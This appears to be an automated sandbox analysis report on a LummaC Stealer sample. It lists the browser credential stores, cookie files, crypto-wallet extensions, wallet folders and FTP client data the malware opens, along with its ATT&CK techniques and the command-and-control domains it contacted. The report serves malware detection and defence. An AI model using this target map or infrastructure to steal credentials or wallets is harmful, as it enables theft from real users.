              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BQJUWOYRTOJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\BUFZSQPCOHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\WDBWCPEFJWJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeDirectory queried: C:\Users\user\Documents\ZUYYDJDFVFJump to behavior
              Source: Yara matchFile source: Process Memory Space: zhQFKte2vX.exe PID: 4208, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: zhQFKte2vX.exe PID: 4208, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		35
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory751
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager35
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials223
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              zhQFKte2vX.exe66%ReversingLabsWin32.Trojan.StealC
              zhQFKte2vX.exe100%AviraTR/Crypt.XPACK.Gen
              zhQFKte2vX.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discokeyus.lat
              		172.67.197.170
              		truefalse
                		high
                grannyejh.lat
                		unknown
                		unknownfalse
                  		high
                  sweepyribs.lat
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      		high
                      https://discokeyus.lat/apifalse
                        		high
                        aspecteirs.latfalse
                          		high
                          energyaffai.latfalse
                            		high
                            sweepyribs.latfalse
                              		high
                              sustainskelet.latfalse
                                		high
                                crosshuaht.latfalse
                                  		high
                                  rapeflowwj.latfalse
                                    		high
                                    grannyejh.latfalse
                                      		high
                                      discokeyus.latfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/chrome_newtabzhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmzhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://discokeyus.lat/apirSzhQFKte2vX.exe, 00000000.00000003.1637662303.0000000001259000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://duckduckgo.com/ac/?q=zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icozhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://grannyejh.lat:443/apiVzhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://ocsp.rootca1.amazontrust.com0:zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://discokeyus.lat/&zhQFKte2vX.exe, 00000000.00000003.1634959757.0000000005B21000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634272116.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634918161.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1635272456.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634525610.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634806498.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://discokeyus.lat/%zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://discokeyus.lat:443/apifu7wner3.default-release/key4.dbPKzhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751540442.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://discokeyus.lat/api0zhQFKte2vX.exe, 00000000.00000002.1753601900.0000000005B2D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.ecosia.org/newtab/zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brzhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ac.ecosia.org/autocomplete?q=zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://discokeyus.lat:443/apiLocalzhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://discokeyus.lat/apiazhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://crl.microzhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668518553.000000000122A000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549507523.0000000001200000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgzhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://x1.c.lencr.org/0zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://x1.i.lencr.org/0zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchzhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://discokeyus.lat/zhQFKte2vX.exe, 00000000.00000002.1751816178.0000000001248000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1600764819.0000000005B1F000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1577738740.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1602483540.0000000005B22000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?zhQFKte2vX.exe, 00000000.00000003.1601429627.0000000005B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uzhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
